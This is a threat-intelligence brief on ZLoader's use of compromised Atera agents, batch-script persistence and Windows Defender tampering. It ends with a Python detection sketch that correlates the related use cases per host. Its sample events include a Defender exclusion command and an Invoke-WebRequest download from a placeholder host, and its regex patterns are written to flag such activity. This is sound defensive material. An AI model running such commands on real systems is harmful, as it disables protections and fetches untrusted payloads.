January 05, 2022


Industry: N/A | Level: Operational | Source: Check Point

Research by Golan Cohen of Check Point Research identifies new activity involving the ZLoader malware. The malware uses compromised remote management software, Atera, for initial access. After the agent is installed, batch scripts are executed to set up persistence and modify Windows Defender properties. The malware attempts to remain stealthy by using many LOLBins.

  • Anvilogic Scenario: ZLoader Installation
  • Anvilogic Use Cases:
    • MSIExec Install MSI File
    • Executable Create Script Process
    • Modify Windows Defender
    • Invoke-WebRequest Command
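
The scenario above chains four use cases on one host. As an added example (not Check Point's or Anvilogic's detection content), the sketch below tags process command lines with those use-case names and alerts when several fire on the same host within a short window. The regex patterns, the 30-minute window, the threshold of three, the host names and the sample events are all assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Use-case names come from the page; the patterns are assumptions for this example.
USE_CASES = {
    "MSIExec Install MSI File":
        re.compile(r"\bmsiexec(\.exe)?\b.*\s/(i|package)\b.*\.msi\b", re.I),
    "Executable Create Script Process":
        re.compile(r"\b(cmd|wscript|cscript)(\.exe)?\b.*\.(bat|cmd|vbs|js)\b", re.I),
    "Modify Windows Defender":
        re.compile(r"\b(Set|Add)-MpPreference\b", re.I),
    "Invoke-WebRequest Command":
        re.compile(r"\bInvoke-WebRequest\b", re.I),
}

# Constructed process-creation events: (timestamp, host, command line).
EVENTS = [
    ("2022-01-05T09:00:00", "WS-01", r'msiexec.exe /i "C:\Users\Public\agent_setup.msi" /qn'),
    ("2022-01-05T09:02:10", "WS-01", r'cmd.exe /c C:\Users\Public\stage1.bat'),
    ("2022-01-05T09:02:15", "WS-01", r'powershell.exe -Command "Add-MpPreference -ExclusionPath C:\Users\Public"'),
    ("2022-01-05T09:02:40", "WS-01", r'powershell.exe Invoke-WebRequest -Uri https://example.invalid/f -OutFile C:\Users\Public\f'),
    ("2022-01-05T10:00:00", "WS-02", r'msiexec.exe /i C:\Installers\office_update.msi'),
    ("2022-01-05T15:30:00", "WS-02", r'powershell.exe Invoke-WebRequest -Uri https://example.invalid/health'),
]

def tag(cmdline):
    """Return the use-case names whose pattern matches this command line."""
    return [name for name, rx in USE_CASES.items() if rx.search(cmdline)]

def correlate(events, window=timedelta(minutes=30), threshold=3):
    """Return {host: sorted use-case names} for hosts where at least
    `threshold` distinct use cases fire inside one `window`."""
    hits = {}
    for ts, host, cmdline in events:
        when = datetime.fromisoformat(ts)
        for name in tag(cmdline):
            hits.setdefault(host, []).append((when, name))
    alerts = {}
    for host, seen in hits.items():
        seen.sort()
        for start, _ in seen:  # try a window opening at each hit
            names = {n for t, n in seen if start <= t <= start + window}
            if len(names) >= threshold:
                alerts[host] = sorted(names)
                break
    return alerts

if __name__ == "__main__":
    for host, names in correlate(EVENTS).items():
        print(host, "->", ", ".join(names))
```

WS-02 shows why the use cases are correlated rather than alerted on individually: a lone MSI install and an unrelated web request hours later are routine administration and stay below the threshold.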